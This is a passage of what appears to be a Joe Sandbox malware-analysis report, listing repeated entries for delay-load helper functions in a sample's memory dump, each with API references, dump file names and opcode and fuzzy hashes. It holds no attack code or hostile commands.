Instruction Fuzzy Hash: A3B012E126D7016D314C63486C02F76020DFDC2B50731452AB20BD01C0D840ACC90432

Function 0081D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4630316bccb7b0736e4f98a00ffcd6463c0138c6ff18326cbc49830b3b2feabd
Instruction ID: d0929298cf94bc16d53728d1694ca21ad94500d7ed549b87d2ab9eb697514c5a
Opcode Fuzzy Hash: 4630316bccb7b0736e4f98a00ffcd6463c0138c6ff18326cbc49830b3b2feabd
Instruction Fuzzy Hash: 5BB012D127D6016C310C62486C02F76024DFDC2B10730442AB20BD01C0D840AC890432

Function 0081D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 316aca16024dc9d3b9dd9d4dd0cbf2a2159558d602c73d6a2f36bd9cd6032a2c
Instruction ID: f9edefd121b8c28b7c6a65ab2ca9c338b419f59e09bbd2911948e5d20999500d
Opcode Fuzzy Hash: 316aca16024dc9d3b9dd9d4dd0cbf2a2159558d602c73d6a2f36bd9cd6032a2c
Instruction Fuzzy Hash: 8BB012D126D6016C310C62586C03F76024CFCC3B10331842AB70BD01C0E940ACC90432

Function 0081D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 517a333e48353d8dee27824a5395940ee6fa2248ea38a7ce51c19abde29e72d5
Instruction ID: 77a94bb896bde6c12d0fc5117e81734014446717f143ac36cfce7ffeb38ee7b2
Opcode Fuzzy Hash: 517a333e48353d8dee27824a5395940ee6fa2248ea38a7ce51c19abde29e72d5
Instruction Fuzzy Hash: B2B012E126D6016C310C62486D03F76028CFCC2B10730442AB20BD01C0E8406DCA0432

Function 0081DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DAB2

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0a7dfe19da7c398f9b27f33b8042e95788959f4d2ee99c8df386fc9fa3dbd9d3
Instruction ID: 6194ccbfffe8931a714cb0f9ea64e8ce0b5f509179e867581a4adaf7dd35479c
Opcode Fuzzy Hash: 0a7dfe19da7c398f9b27f33b8042e95788959f4d2ee99c8df386fc9fa3dbd9d3
Instruction Fuzzy Hash: EAB012E126C601EC3108B1496C12F7B034CFCC0B10330C11BB50AC0184D8484D8D4433

Function 0081DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DAB2

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e25218ddce30edbc492f1e70b7cf5d2e8c5da46db6f21f0ecb79b60c861f80d2
Instruction ID: 7cd11a50fa7745dca37a63dffa509cf6c7faf25d11b11fba25820b4ca86d140c
Opcode Fuzzy Hash: e25218ddce30edbc492f1e70b7cf5d2e8c5da46db6f21f0ecb79b60c861f80d2
Instruction Fuzzy Hash: 30B012D126C6016C3108B14D6D12F7F034CFCC4B14330851BB20AD0144D8444C8E4433

Function 0081DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DBD5

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d115b3688d8f17aee2485f6bfbfbcd317f70198ebc3f558bdefc36ed0a859f72
Instruction ID: 817690b90934a43a4ab61881ac34020ce6ea3e535364ecdfa05ee376514917bd
Opcode Fuzzy Hash: d115b3688d8f17aee2485f6bfbfbcd317f70198ebc3f558bdefc36ed0a859f72
Instruction Fuzzy Hash: 64B012D637C70A7C3208114C2C07EB7021CF8C0B30331452AB207D40409D444CCE4033

Function 0081DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DBD5

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8420ec24acce84c919cf86eba80826f28811b9cc7e58c10173734654a82a2e94
Instruction ID: 15628042178a3c474b92e101b423ecead2c15249bbc4e26bc62447d8b7733cf4
Opcode Fuzzy Hash: 8420ec24acce84c919cf86eba80826f28811b9cc7e58c10173734654a82a2e94
Instruction Fuzzy Hash: 3AB012D636C6056C3108515C2C07FB6021CF8C0B30331442AB21BC0140DD404C8E4033

Function 0081DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DBD5

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 690313d1c6d4496f5edb2ee792702cca1731d3cd2036f3ef36321ccd006275af
Instruction ID: 52102d178302be8f5e4a4061dc16517a24582c32a3a239f6c31417a55234106e
Opcode Fuzzy Hash: 690313d1c6d4496f5edb2ee792702cca1731d3cd2036f3ef36321ccd006275af
Instruction Fuzzy Hash: 13B012D636C606AC310C514C2C07FB7026CF8C0B30331851AB60BC5180DD444C8E4033

Function 0081DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DBD5

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 30b259e130b571ad513ecdad0856386043a733e2db4589c29d06a99f64a13e58
Instruction ID: 9e661c3fa7ef575da0237983851e692b149704903b25beb3c5e341c73108b189
Opcode Fuzzy Hash: 30b259e130b571ad513ecdad0856386043a733e2db4589c29d06a99f64a13e58
Instruction Fuzzy Hash: 47B012D636C6067C310C514C2D07FB7025CF8C0B30331841AB30BC4140DD444C8B4033

Function 0081DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DAB2

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1dbff822f8eb6d3d4e0857864f6b57c3923fb2446fb609f8751eabef5b8387db
Instruction ID: ab1de2d5d3691f473a09ed34586282809bc7e561f55fc72bdf93b2531e59117f
Opcode Fuzzy Hash: 1dbff822f8eb6d3d4e0857864f6b57c3923fb2446fb609f8751eabef5b8387db
Instruction Fuzzy Hash: DBB012D12AC7056C7108F1496C12F7B034CFCC0B10330411BB10AC0144D8444C894533

Function 0081DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DC36

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 10904b282e8d8670f7286e7373b820c0f0155d941baeaf8e4af06bfc71c298e8
Instruction ID: 912bcb791c9dbdb755fa51349b11f07e4b351bda2e80f0d943440da53def55a5
Opcode Fuzzy Hash: 10904b282e8d8670f7286e7373b820c0f0155d941baeaf8e4af06bfc71c298e8
Instruction Fuzzy Hash: F5B012D626C305BD710C21486E02FB6022CFAC1B103314A1AB30AE014099847CC95472

Function 0081DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DC36

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 964881a78e9ce4b385eb917588514b7f8b3d7ba7a025aa34e2eb9d20fb6a2b15
Instruction ID: d7a2d3a9dd52f2e00397fe94e85424a3326548131cd69875bca2cdcf85d6f6d3
Opcode Fuzzy Hash: 964881a78e9ce4b385eb917588514b7f8b3d7ba7a025aa34e2eb9d20fb6a2b15
Instruction Fuzzy Hash: 4DB012D626C301AC710C614C6C02FB6022CF9C6B10330891AB70ED1280D9847C894472

Function 0081DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DC36

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e2c0a2353b9a90bb7b5470e649820837c0075c05107bfef8bfbb090a7ff7e467
Instruction ID: 3ee6118f0067b5726310b3ca8f79aa7c343af6e8a32db33b26a26bb688abc4bc
Opcode Fuzzy Hash: e2c0a2353b9a90bb7b5470e649820837c0075c05107bfef8bfbb090a7ff7e467
Instruction Fuzzy Hash: E8B012D627C301AC710C614C6C02FB6022CF9C1B10330491BB30ED1240D9847C894472

Function 0081D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 541c1e2ab079e0f7c9eebe63b6b8af6ac4094d637187f3fada0e39cb2de4d435
Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
Opcode Fuzzy Hash: 541c1e2ab079e0f7c9eebe63b6b8af6ac4094d637187f3fada0e39cb2de4d435
Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832

Function 0081D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1ebb49b0ffd33fabf2fec16edcd67e3e82539259c53bb7862a503f7c3ce24b03
Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
Opcode Fuzzy Hash: 1ebb49b0ffd33fabf2fec16edcd67e3e82539259c53bb7862a503f7c3ce24b03
Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832

Function 0081D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e243b80690af2dde8379e7c336094f6bf203ab9abefb39b9157b0d3f4ffd3e9a
Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
Opcode Fuzzy Hash: e243b80690af2dde8379e7c336094f6bf203ab9abefb39b9157b0d3f4ffd3e9a
Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832

Function 0081D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
